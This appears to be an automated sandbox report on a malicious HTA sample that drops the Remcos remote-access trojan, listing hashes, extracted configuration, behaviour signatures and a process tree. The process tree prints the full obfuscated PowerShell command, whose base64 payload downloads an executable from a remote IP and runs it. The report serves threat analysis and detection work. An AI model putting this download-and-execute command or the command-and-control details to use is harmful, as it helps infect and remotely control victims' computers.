Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 03:13
Behavioral task
behavioral1
Sample
6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta
Resource
win7-20240708-en
General
-
Target
6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta
-
Size
142KB
-
MD5
22ca9f87ffb6d9d3dc9d7e4f151470c7
-
SHA1
df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
-
SHA256
6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
-
SHA512
e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
-
SSDEEP
768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn
Malware Config
Extracted
remcos
elvis
107.173.4.16:2560
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-GJDISH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1948 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 1948 powershell.exe 2548 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2832 nicetomeetyousweeet.exe -
Loads dropped DLL 4 IoCs
pid Process 1948 powershell.exe 1948 powershell.exe 1948 powershell.exe 1948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1948 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1312 wrote to memory of 2548 1312 mshta.exe 30 PID 1312 wrote to memory of 2548 1312 mshta.exe 30 PID 1312 wrote to memory of 2548 1312 mshta.exe 30 PID 1312 wrote to memory of 2548 1312 mshta.exe 30 PID 2548 wrote to memory of 1948 2548 cmd.exe 32 PID 2548 wrote to memory of 1948 2548 cmd.exe 32 PID 2548 wrote to memory of 1948 2548 cmd.exe 32 PID 2548 wrote to memory of 1948 2548 cmd.exe 32 PID 1948 wrote to memory of 2724 1948 powershell.exe 33 PID 1948 wrote to memory of 2724 1948 powershell.exe 33 PID 1948 wrote to memory of 2724 1948 powershell.exe 33 PID 1948 wrote to memory of 2724 1948 powershell.exe 33 PID 2724 wrote to memory of 2836 2724 csc.exe 34 PID 2724 wrote to memory of 2836 2724 csc.exe 34 PID 2724 wrote to memory of 2836 2724 csc.exe 34 PID 2724 wrote to memory of 2836 2724 csc.exe 34 PID 1948 wrote to memory of 2832 1948 powershell.exe 37 PID 1948 wrote to memory of 2832 1948 powershell.exe 37 PID 1948 wrote to memory of 2832 1948 powershell.exe 37 PID 1948 wrote to memory of 2832 1948 powershell.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
-
C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"4⤵
- Executes dropped EXE
PID:2832
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58110369b4913d58f30a9030194c940a9
SHA12779cbcc810e1c9131b6719623413e94003783af
SHA256e52e6c7fe5ca62bbc133701402d74056bdefbfa9c1482ea208d85d239ffd5764
SHA512a3400402f87b690a1705d0e3e7b1415fb8cf5118be10831fdfa999f9950db9fe02c04ace316a6b05d8589f46ad9dd67df15ab4d68cc7f3fc772c5702ef7f2ba2
-
Filesize
7KB
MD5623b34b0b11542173d7afacc1f245194
SHA1d78e417fa305d8b4c8ec34f7916dd5eabed6bca9
SHA25605f3834f9bdd0125f4a88b297e66f6d005dd843bb41c816ddb5dbf682664d360
SHA512cd51afe2825eb936bd54b1ecf198e54c362683dc849e04186ecd4bae3dafbc88cba2d930fdf9a6dd8cb6dc4e759ec748c2dc514e181d85eee1fa8e13cc180d7f
-
Filesize
1KB
MD51d1077f4fe6effcd680e9469bc69297c
SHA1243294c27f012751b2046bca693566fa6ccb7c09
SHA25684dba55adb984305279022808c924e0728979d7c1b0500bfc3a5dbcb75150b67
SHA5124d53c3a42e68257d6fe032e415ff4ca60257b62e467c67ca7619c78995df796ca9b6ba5301cef22d64446e22965538f1545072edb2c2b9096403d58fd0bd652a
-
Filesize
478B
MD580c03b4485808d996cc8226157f377a7
SHA17cc7e02b84232b1523c555a349c86fc059a98eff
SHA256240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d
SHA512ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c
-
Filesize
309B
MD5aee07cca87aa1776ace9f469ad15a73d
SHA17d7b93792051018aea6c00d4ee17f2b4b6c5f428
SHA2563d8dcbd6494604eaa16b0f77c4fd7397731a864acd73827646f66476962de650
SHA51283306f22068685877104e291e1ac9fab4ae39d7159bd274b62c85f9636bf615628da7015231da1ab2d792772f36575d3a3846e89124e465755f83b2dafa9c33f
-
Filesize
652B
MD58456482394366df9e37a3d3751b53fbe
SHA1c4493efa4a4488f4899642f40fb5486789e4bb3a
SHA256792bc9d88e1ad5d6435b2798268660563efd16203dca9579dc61fe98f7eaf3ee
SHA512b0c337636bfc446b7d14120e01447afdd217edc9891c7104106501156cdd4c6d31687afeaf3309a71d902d8167bfb41d85e1afbc6b44daeb720889b736c66c14
-
Filesize
530KB
MD5c6b0fba610732719435d9621878bc605
SHA1789afce0b2016029215db7cca0ce7c4acfa54b4c
SHA256ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d
SHA5125d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933